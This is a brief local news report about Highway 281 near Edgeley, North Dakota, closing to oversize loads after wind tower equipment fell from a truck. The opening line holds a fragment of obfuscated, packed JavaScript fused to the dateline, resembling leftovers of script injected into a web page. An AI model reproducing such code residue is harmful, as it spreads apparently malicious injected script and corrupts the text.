EDGELEY fzzez|var|u0026u|referrer|ttskh||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The North Dakota Department of Transportation said Thursday that a stretch of Highway 281 near Edgeley is temporarily closed to oversize loads due to a piece of wind tower equipment blocking the roadway.

Jamie Olson with the DOT said Thursday afternoon that a portion of the road to the south of the junction with Highway 13 near Edgeley was blocked. Normal traffic and semi-trucks can still travel through the area by taking an adjacent frontage road around the closed portion of the road.

The large piece of wind tower equipment fell off the truck that was hauling it Thursday.

The road should be re-opened to oversize loads Friday afternoon.
